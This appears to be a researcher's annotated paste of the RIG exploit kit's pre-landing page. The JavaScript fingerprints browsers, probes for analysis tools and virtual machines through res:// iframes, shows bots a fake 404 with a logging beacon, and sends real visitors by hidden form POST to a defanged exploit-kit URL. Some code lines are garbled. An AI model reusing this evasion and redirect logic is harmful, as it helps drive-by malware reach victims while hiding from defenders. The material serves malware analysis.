
Commented JavaScript from RIG's pre-landing page

Mar 7th, 2017
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  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <title></title>
  5. <meta charset="UTF-8">
  6. <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  7. <meta name="apple-mobile-web-app-capable" content="yes">
  8. <meta name="apple-mobile-web-app-status-bar-style" content="black">
  9. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  10. </head>
  11. <body>
  12. <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
  13. <script>
  14. var NormalURL = 'http://try[.]WERREW[.]INFO/?oq=m3Wp_YrLbNVNVDhiECBclBhnYlZW1NHovv9h0jUzR6fhMHQ-UHbUTp1u9CQUbI&q=wXjQMvXcJwDQCobGMvrESLtNNknQA0KK2Iv2_dqyEoH9cmnihNzUSkrx6B2aC';
  15. var InfoStr = '';
  16. var appPaths,foundObjects,appsCount,framesLoaded,foundAppsCounter,iFrameObject;
  17. var iFrameName = 'myFrame';
  18. var debug = false;
  19. var isChecked = 0;
  21. // doubly-declared? but initialized by calling the genPaths() function
  22. var appPaths = genPaths();
  25. function getBrowser() {
  26. var ua = navigator.userAgent;
  28. var browsrObj = {
  29. browser: 'unknown',
  30. browser_real: '',
  31. is_bot: false,
  32. browser_quality: 0,
  33. platform: 'desktop',
  34. versionFull: '',
  35. versionShort: ''
  36. };
  38. try{
  40. var bName = function () {
  41. if ( > -1) return "edge";
  42. if (( > -1) || ( > -1)) return "ie";
  43. if ( > -1) return "firefox";
  44. if (( > -1) || ( > -1)) return "opera";
  45. if ( > -1) return "yabrowser";
  46. if ( > -1) return "chrome";
  47. if ( > -1) return "safari";
  48. if ( > -1) return "maxthon";
  49. else return "unknown";
  50. }();
  52. browsrObj.browser = bName;
  54. if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
  56. var version;
  57. if(bName != 'unknown')
  58. {
  59. switch (bName) {
  60. case "edge":
  61. version = (ua.split("Edge")[1]).split("/")[1];
  62. break;
  63. case "ie":
  64. if(( > -1))
  65. {
  66. version = (ua.split("; rv:")[1]).split(")")[0];
  67. }
  68. else
  69. {
  70. version = (ua.split("MSIE ")[1]).split(";")[0];
  71. }
  72. break;
  73. case "firefox":
  74. version = ua.split("Firefox/")[1];
  75. break;
  76. case "opera":
  77. version = ua.split("Version/")[1];
  78. break;
  79. case "operaWebkit":
  80. bName = "opera";
  81. version = ua.split("OPR/")[1];
  82. break;
  83. case "yabrowser":
  84. version = (ua.split("YaBrowser/")[1]).split(" ")[0];
  85. break;
  86. case "chrome":
  87. version = (ua.split("Chrome/")[1]).split(" ")[0];
  88. break;
  89. case "safari":
  90. version = (ua.split("Version/")[1]).split(" ")[0];
  91. break;
  92. case "maxthon":
  93. version = ua.split("Maxthon/")[1];
  94. break;
  96. }
  98. browsrObj.versionFull = version;
  99. browsrObj.versionShort = version.split(".")[0];
  100. }
  102. } catch (err) {}
  105. var w=window,d=document;
  106. var CorrectBrowser = true;
  107. var uaBrowser = browsrObj;
  108. var isIE = isChrome = isFirefox = isOpera = 0;
  110. if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
  111. {
  112. if('ActiveXObject' in window) isIE++;
  113. if('chrome' in window) isChrome++;
  114. if('opera' in window) isOpera++;
  116. if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
  118. if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
  121. var f=0;
  122. f|='sandbox' in d.createElement('iframe')?1:0;
  123. f|='WebSocket' in w?2:0;
  124. f|=w.Worker?4:0;
  125. f|=w.applicationCache?8:0;
  126. f|=w.history && history.pushState?16:0;
  127. f|=d.documentElement.webkitRequestFullScreen?32:0;
  128. f|='FileReader' in w?64:0;
  131. if(f==0) isIE++;
  133. if(isIE > 0)
  134. {
  135. browsrObj.browser_real = 'ie';
  136. browsrObj.browser_quality = isIE;
  137. }
  138. if(isChrome > 1 && isFirefox == 0)
  139. {
  140. browsrObj.browser_real = 'chrome';
  141. browsrObj.browser_quality = isChrome;
  142. }
  143. if(isFirefox > 0 && isChrome == 0)
  144. {
  145. browsrObj.browser_real = 'firefox';
  146. browsrObj.browser_quality = isFirefox;
  147. }
  149. if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
  150. }
  152. InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
  154. return browsrObj;
  155. }
  157. //////////////////////////////////////////////// THIS LOOKS LIKE WHERE THE NEW_PRE-FILTER_CHECKS STARTS ////////////////////////////////////////////////
  158. // Tests for debugging, and the logs the value passed into deb(c).
  159. function deb(o) {
  160. if (!debug) return false;
  161. console.log(o);
  162. }
  164. // This function is called from within the createiFrame(), objectStateCheck(), countFrameLoaded(), and go() functions.
  165. // The return value is the version number, otherwise, -1.
  166. function getInternetExplorerVersion() {
  167. // Declare and assign the variable 'rv' to the value -1.
  168. var rv = -1;
  170. // Parse out the verison of the Internet Explorer browser.
  171. if (navigator.appName == 'Microsoft Internet Explorer') {
  172. var ua = navigator.userAgent;
  173. // Checks for versions prior to IE11.
  174. var re = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
  175. // Executes for a search in a string ('ua') for the regex object ('re').
  176. if (re.exec(ua) != null)
  177. // As long as the return value was not null, then parse out the version.
  178. rv = parseFloat( RegExp.$1 );
  179. } else if (navigator.appName == 'Netscape') {
  180. // Same operations done for the Netscape derivative.
  181. var ua = navigator.userAgent;
  182. var re = new RegExp("Trident/.*rv:([0-9]{1,}[\.0-9]{0,})");
  183. if (re.exec(ua) != null)
  184. rv = parseFloat( RegExp.$1 );
  185. }
  186. return rv;
  187. }
  189. // This function is called from the go() function.
  190. function createiFrame(c){
  191. // Initialize and assign the iframe on the page.
  192. var d=document.createElement('iframe');
  193. // Set the 'id' attribute to 'myFrame' plus the current for-loop index. For example, 'myFrame0', 'myFrame1', etc.
  194. d.setAttribute('id',iFrameName+c);
  195. // Set the 'name' attribute of the iframe to the same value of the 'id' field. For example, 'myFrame0', 'myFrame1', etc.
  196. d.setAttribute('name',iFrameName+c);
  197. // Set the height and width of the iframe to a single pixel.
  201. // The function delclaration for zrs() exists to call the function "objectCheckState(c)".
  202. function zrs(){objectCheckState(c);}
  204. // The function declaration for zlo() exists to call the function "countFrameLoaded(c)".
  205. function zlo(){countFrameLoaded(c);}
  207. // If the victim's browser is IE11, then perform the following setAttribute methods.
  208. if (getInternetExplorerVersion()==11) {
  209. // Specifies what function to be called when the readyState property changes.
  210. d.setAttribute('onReadyStateChange',"objectCheckState('"+c+"')");
  211. // This event occurs when an object has been loaded.
  212. d.setAttribute('onLoad',"countFrameLoaded('"+c+"')");
  213. } else {
  214. // If the browser version is not IE11, then do the following.
  215. // Use eventListeners to perform the same functions above done with the setAttribute methods.
  216. if(d['addEventListener']){
  217. // Add the listener and then call the zrs() function when the readyState property changes.
  218. // This performs a objectCheckState(c) function called through the zrs() function call.
  219. d['addEventListener']('readystatechange',zrs,false);
  220. // Add the listener and then call the zlo() function when the document has been loaded.
  221. // This performs a countFrameLoaded(c) function called through the zlo() function call.
  222. d['addEventListener']('load',zlo,false);
  223. } else {
  224. // If the 'addEventListener' means didn't work, then try the same iframe state changes with 'attachEvent'.
  225. if(d['attachEvent']){
  226. d['attachEvent']('on'+'readystatechange',zrs);
  227. d['attachEvent']('on'+'load',zlo);
  228. }
  229. }
  230. }
  232. // Set the source attribute to the 'res' key's value and then add the child to the document.
  233. d.setAttribute('src',appPaths[c]['res']);
  234. document.body.appendChild(d);
  235. }
  237. function objectCheckState(c){
  238. // For IE11 browsers.
  239. if (getInternetExplorerVersion()==11) {
  240. // For when the 'stateIterate' value is zero, this state indicates the readyState is request not initialized.
  241. if (!appPaths[c]['stateIterate'])
  242. // Then, set the readyState of the iframe to server connection established.
  243. appPaths[c]['stateIterate']=1;
  244. // Otherwise, then increment the readyState of the iframe from whatever the current state of it is.
  245. // This would occur when more than a single call is made on the iframe.
  246. else appPaths[c]['stateIterate']++;
  247. }
  249. // This is done for none IE11 browsers; however, this will be done twice by the IE11 browsers.
  250. // Define and assign the readyState of the iframe and perform the same behavior above.
  251. var rs = document.getElementById(iFrameName+c).readyState;
  252. if (!appPaths[c][rs])
  253. appPaths[c][rs]=1;
  254. else appPaths[c][rs]++;
  255. }
  257. // This function is called from within the createiFrame(c) function
  258. function countFrameLoaded(c){
  259. // Find the appPaths name of the current for-loop interation index.
  260. var _cfl_appName=appPaths[c]['name'];
  261. // Find the appPaths type of the current for-loop interation index.
  262. var _cfl_appType=appPaths[c]['type'];
  264. // Here test if: interactive > 1 OR (stateIterate == 1 AND IE11)
  265. if(appPaths[c]['interactive']>1 || (appPaths[c]['stateIterate']==1 && getInternetExplorerVersion()==11)){
  266. // Push that application name onto the foundObjects stack.
  267. foundObjects.push(_cfl_appName);
  268. } else {
  269. };
  271. // Increment the current counter of how many frames have been loaded.
  272. framesLoaded++;
  274. // If the number of iframes counted equals the number of applications loaded for checking, then call the finishChecking() function.
  275. if (framesLoaded==appsCount) {
  276. finishChecking();
  277. }
  278. }
  280. // This function is called from within the countFrameLoaded(c) function, and accepts no input.
  281. function finishChecking() {
  282. // BrowserInfo contains the browserObj returned from getBrowser().
  283. BrowserInfo = getBrowser();
  284. // This variable is initialized as 0 at the beginning of the document.
  285. isChecked++;
  287. // This checks for objects found such as: AV, VMs, etc.
  288. // The operations done on the foundObjects iteration was commented out.
  289. if (foundObjects.length>0) {
  290. dopStr = 'VM';
  291. for (i in foundObjects) {
  292. //dopStr = dopStr+'_'+foundObjects[i];
  293. }
  294. // This is just going to contain "VMVMVMVMVM" for however many found objects there are.
  295. InfoStr =InfoStr+dopStr;
  296. }
  298. // If the browser is a bot or there are several objects found. Print the same string that would be printed for when isChecked is zero.
  299. if(BrowserInfo.is_bot == true || foundObjects.length>0) {
  300. document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>');
  301. } else {
  302. // If this is not a bot, then post the document back as normal (the EK request).
  303. window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
  304. }
  306. // Then call the deleteiFrame('myFrame#') function.
  307. var b=0;
  308. for(b=0;b<appsCount;b++){
  309. deleteiFrame('myFrame'+b);
  310. }
  311. }
  313. // This function is called from within the finishChecking() function.
  314. function deleteiFrame(c) {
  315. // Find the iframe and then remove the child.
  316. var d=document.getElementById(c);
  317. d.parentNode.removeChild(d);
  318. }
  320. // This function is first called at the beginning of the html page to assign the value to the "appPaths" variable.
  321. function genPaths() {
  323. // below are three declared and assigned variables for static strings on the machine
  324. // in this case, the System32, Program Files, and Program Files (x86) paths
  325. var path_sys32 = '\\Windows\\System32\\drivers\\',
  326. path_pf = 'C:\\Program Files\\',
  327. path_pfx86 = 'C:\\Program Files (x86)\\';
  329. // The variable "appPath" is an array of dictionaries that contains key-value pairs for tools, AV, and VMs.
  330. // It appears these are dictionary structures that contain the path location to cross-reference the victim machine for these items.
  331. // NOTE, the AV signatures have been commented out currently for some reason.
  332. var appPath = [
  333. {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\Fiddler.exe',type:'tool',filetype:'pf'},
  334. {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\uninst.exe',type:'tool',filetype:'pf'},
  335. {name:'FFDec',resident:'/#24/1',res:'FFDec\\Uninstall.exe',type:'tool',filetype:'pf'},
  337. /* the two path signatures were commented out for some reason
  338. {name:'NOD32',resident:'/#24/1',res:'ESET\\ESET NOD32 Antivirus\\egui.exe',type:'av',filetype:'pf'},
  339. {name:'Bitdefender',resident:'/#24/1',res:'Bitdefender Agent\\ProductAgentService.exe',type:'av',filetype:'pf'},
  340. */
  342. {name:'VirtualBox',resident:'/#24/#1',res:'Oracle\\VirtualBox Guest Additions\\uninst.exe', type:'vm',filetype:'pf'},
  343. {name:'VMware',resident:'/#16/#1',res:'VMware\\VMware Tools\\TPAutoConnSvc.exe',type:'vm',filetype:'pf'},
  344. {name:'VMware',resident:'/#24/2',res:'VMware\\VMware Tools\\VMToolsHook.dll',type:'vm',filetype:'pf'}
  345. ];
  347. // Initializes the variable "appPathsCompilled" to an empty array.
  348. var appPathsCompilled = [];
  350. for(var i=0;i<appPath.length;i++) {
  351. // Currently, no dictionary keys for filetype that has been assigned the value of 'driver', thus this is not executed.
  352. if (appPath[i]['filetype']=='driver') {
  353. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_sys32 + appPath[i]['res'] + '.sys' + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
  354. }
  356. // All the files in the appPath dictionary array have a filetype of 'pf'.
  357. // Then the files are constructed into a dictionary and pushed onto the array (stack), with the paths for both Program Files and x86
  358. if (appPath[i]['filetype']=='pf') {
  359. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pfx86 + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
  360. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pf + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
  361. }
  362. }
  364. return appPathsCompilled;
  365. }
  367. // This function is called by the iframe at the top of the html page and that same iframe specifies a timeout of 99ms
  368. function go() {
  369. // Initialize the foundObjects variable declared at the beginning of the html page
  370. foundObjects=[];
  372. // With an appPath.length of seven and then doubled by adding a Program Files and Program Files (x86) versions, then this should be fourteen
  373. appsCount=appPaths.length;
  375. // Initialize the framesLoaded variable.
  376. framesLoaded=0;
  378. // Initialize the iFrameObject variable to an empty array.
  379. iFrameObject={};
  382. for(var c=0;c<appsCount;c++) {
  383. // Check to ensure the given array index of appPaths[] is not 'undefined', otherwise, the error should be logged to the browser's console.log.
  384. if (typeof appPaths[c] == 'undefined') deb('IS UNDEFINED '+c);
  385. // If not 'undefined', then create the iframe by calling the createiFrame(c) function.
  386. // The value passed into the createiFrame(c) function is the current index of the for-loop.
  387. createiFrame(c);
  388. }
  390. // If the finishChecking() function is never run, then the value of isChecked does not changed and, consequently, will remain as 0 (or boolean false)
  391. if(isChecked == false) {
  392. BrowserInfo = getBrowser();
  393. // Check the is_bot field, if it's true; then write the information below. This is the 404 Not Found and specifying the contacted version of server.
  394. // The iframe is the domain "/log.php?info=" + InfoStr + "NOchecked".
  395. if(BrowserInfo.is_bot == true) {
  396. document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'NOchecked" width=10 height=10></iframe></body></html>');
  397. }
  398. // If the is_bot field is false, then print the information below. This is the 404 Not Found and specifying the contacted version of server.
  399. // The iframe contains more information "/log.php?info=" + InfoStr + "NOcheckedNOBOT" + browserVersion.
  400. else {
  401. window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
  402. //document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="log.php?info='+InfoStr+'NOcheckedNOBOT'+getInternetExplorerVersion()+'" width=10 height=10></iframe></body></html>');
  403. }
  404. }
  405. }
  407. </script>
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